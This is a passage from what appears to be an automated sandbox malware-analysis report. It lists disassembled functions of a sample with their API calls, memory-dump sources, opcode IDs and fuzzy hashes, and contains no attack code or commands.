                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF65601475C,?,?,00000000,00007FF6560147D9,?,?,?,?,?,00007FF656062210), ref: 00007FF65601BF3F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$FileSystem
                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                    • API String ID: 2086374402-595813830
                                                                                                                    • Opcode ID: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                                                                                    • Instruction ID: 1676be5d1ff46632dc12d47c2da7cf81fdbb932605d53bb765911d9cedd68b83
                                                                                                                    • Opcode Fuzzy Hash: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                                                                                    • Instruction Fuzzy Hash: 32F06510A1974791FE05AF52FA441B42352AF847C8F8C5035D91E67751DF3DD48CC700
                                                                                                                    Function 00007FF6560267F0 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 15204871-0
                                                                                                                    • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                                                                    • Instruction ID: 29f56d36484ccb7236ea05eed410240ad9a8869f0b35e6e06902b89b05f830ac
                                                                                                                    • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                                                                    • Instruction Fuzzy Hash: 10B16B73614B898BEB15CF29C94536C7BA0FB44B48F188926DA9D937A4CF3AD4A5C700
                                                                                                                    Function 00007FF6560671F4 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                                                    • Instruction ID: 9ec3b73099210f7d1779a35323a71624e7197d81e78c79d0897b62d6299a98e5
                                                                                                                    • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                                                    • Instruction Fuzzy Hash: 37113A76A0874282EB109F26E1882697760FB88FA4F088631DB6D97B95CF7DD855CB40
                                                                                                                    Function 00007FF656063778 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                                                    • Instruction ID: 9d641dc52052857f935b2a280e469de360d9572bdd041760f6751d145d9191ab
                                                                                                                    • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                                                    • Instruction Fuzzy Hash: 34F0C82160864281E7605B16F50436EA3A6FFC9794F185134EB9D93B99DF3DC448CB00
                                                                                                                    Function 00007FF6560195B0 Relevance: 2.9, Strings: 2, Instructions: 378COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: a/p$am/pm
                                                                                                                    • API String ID: 0-3206640213
                                                                                                                    • Opcode ID: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                                                                                    • Instruction ID: 961c98fa3e8de22614a432009eb746208183956a0868dd0b0f01ee2287e5f5b8
                                                                                                                    • Opcode Fuzzy Hash: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                                                                                    • Instruction Fuzzy Hash: 29E1B232E0865286EF648F248A545BD23A5FF41788F9D4132EA5EA7684DF3FE95CC340
                                                                                                                    Function 00007FF65600C3FC Relevance: 2.7, Strings: 2, Instructions: 219COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: 0$0x%p
                                                                                                                    • API String ID: 3215553584-2479247192
                                                                                                                    • Opcode ID: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                                                                    • Instruction ID: 134af46b7a334cbc4eda58b41cab317330a804ffaf5f5d677bb401e7ad3354cc
                                                                                                                    • Opcode Fuzzy Hash: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                                                                    • Instruction Fuzzy Hash: B281D22AA1824246EAA88E25824467D23D0EF45B75FDC1531ED0EF7695CF3FE88ED700
                                                                                                                    Function 00007FF655FFFA4F Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: no error
                                                                                                                    • API String ID: 0-1106124726
                                                                                                                    • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                                                                    • Instruction ID: a15ceb48c294f72cd5cdbee2b70b407a887502500261372279b3b9e0b117cdf4
                                                                                                                    • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                                                                    • Instruction Fuzzy Hash: D612CE76A187928AE728CF65D4402AD33B0FB04B48F145135EF8EA7B94DF39E954CB40
                                                                                                                    Function 00007FF65606E87C Relevance: 1.6, APIs: 1, Instructions: 62filenetworkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileInternetRead_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 101623796-0
                                                                                                                    • Opcode ID: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                                                                    • Instruction ID: 04bc956cb4c2c75620a7371ba3fb00e3428a499f30692b0e3a5b02ef96ec061a
                                                                                                                    • Opcode Fuzzy Hash: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                                                                    • Instruction Fuzzy Hash: F421C422B1C74286FB74CA52E1107B92390FB84B88F885131DB4CA7B85DF3DE64ACB40
                                                                                                                    Function 00007FF656059420 Relevance: 1.5, APIs: 1, Instructions: 26keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InputSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3431551938-0
                                                                                                                    • Opcode ID: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                                                                    • Instruction ID: be59e7fec0f845015dfdf99023ef89cfe609dc521e41c2200a30cd9797a9747a
                                                                                                                    • Opcode Fuzzy Hash: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                                                                    • Instruction Fuzzy Hash: DEF0BEB691C6C0CAD3218F11E54076A77A1F75878DF446119EB8987BA4CF3EC50ACF04
                                                                                                                    Function 00007FF65605D158 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: mouse_event
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2434400541-0
                                                                                                                    • Opcode ID: 6674be8b64349246c9dd3b232f8eab8a138cd1fe159d5217082064005974ec36
                                                                                                                    • Instruction ID: 4f280cad1c45a948c0a7b50a704d3c9993d445e3e750d3e0eaed397cbeb360fd
                                                                                                                    • Opcode Fuzzy Hash: 6674be8b64349246c9dd3b232f8eab8a138cd1fe159d5217082064005974ec36
                                                                                                                    • Instruction Fuzzy Hash: C5E0DF66E0C14372F2690A38872EB340252FFB1304E5C0232C609B6AE1CD0FA60FE70C
                                                                                                                    Function 00007FF65600C130 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                                    • Opcode ID: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                                                                    • Instruction ID: 31c4407b5e691ef8ca2c90668d17f3793010261be0a5468210cc88f51b306715
                                                                                                                    • Opcode Fuzzy Hash: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                                                                    • Instruction Fuzzy Hash: 2B81C322A2864246EAA88E55824467E23D0EF45B74F9C2531DD09F7A95CF3FEC4ED740
                                                                                                                    Function 00007FF65600BEB4 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                                    • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                                                                    • Instruction ID: 47c1d58ddd934942d2d6a6a1e0720e5e81b1ab05dafaa2f733009e114ced55bc
                                                                                                                    • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                                                                    • Instruction Fuzzy Hash: 2D71D365A0C28246EA689E2993406BD67D49F41B74FAC0535DE08F76D6CF3FE84ECB01
                                                                                                                    Function 00007FF65601A8A0 Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 0-2766056989
                                                                                                                    • Opcode ID: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                                                                    • Instruction ID: 42b18882890540a62864034c3390edab74f75387c281743ed562c0b9d7ff8425
                                                                                                                    • Opcode Fuzzy Hash: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                                                                    • Instruction Fuzzy Hash: EE41BF22714B5486EA04DF2ADA142A9B3A1FB4CFD4B5DA036DE0D97754EF3ED44AC300
                                                                                                                    Function 00007FF655FF58D0 Relevance: .7, Instructions: 692COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a4b43b05b4d174de04649b256e334c2e39119974175c185e79b62e938d94deaa
                                                                                                                    • Instruction ID: b7f456c76e7b2d27b5b56c58883c3fd470589bdf3e3ac83102d1cb71451aec87
                                                                                                                    • Opcode Fuzzy Hash: a4b43b05b4d174de04649b256e334c2e39119974175c185e79b62e938d94deaa
                                                                                                                    • Instruction Fuzzy Hash: BB52CF3AA0C64282EA34DB25D09C67D27A5EF15F8CF1D4576CA5EA7A81CF7DE840CB40
                                                                                                                    Function 00007FF655FEB390 Relevance: .7, Instructions: 682COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 118556049-0
                                                                                                                    • Opcode ID: 15c9b4ff0d6c777accddb7297f0b6f18c58627f5bf608979e553ed2db80b772c
                                                                                                                    • Instruction ID: e2344514f0d1ac9d38b875fca642addc23e6fa5ee5e2031af188b1441a69d248
                                                                                                                    • Opcode Fuzzy Hash: 15c9b4ff0d6c777accddb7297f0b6f18c58627f5bf608979e553ed2db80b772c
                                                                                                                    • Instruction Fuzzy Hash: 4A52D076B0964289EB50DF65D5482BC33A2FB44BA8F484231DE1DB77D9DE39E809C740
                                                                                                                    Function 00007FF655FEB9F0 Relevance: .6, Instructions: 577COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f5aa817522376051c618d1bb1769104268ef2704087421bedbb1ece988ef302e
                                                                                                                    • Instruction ID: 1d700ebf8c0f9021cf10a875a7c83cfbf7cba49fd820653576fd28b6b4ffef89
                                                                                                                    • Opcode Fuzzy Hash: f5aa817522376051c618d1bb1769104268ef2704087421bedbb1ece988ef302e
                                                                                                                    • Instruction Fuzzy Hash: D242C036B0878286EB50DF25D9842BD37A0FB84B98F584135DE5DA7B95CF39E849CB00
                                                                                                                    Function 00007FF6560130DC Relevance: .5, Instructions: 535COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                                                                    • Instruction ID: df634a1e7cac4d9940ac0fe4144694a5c103a85eae6876b16bf5cb6ad6433bc6
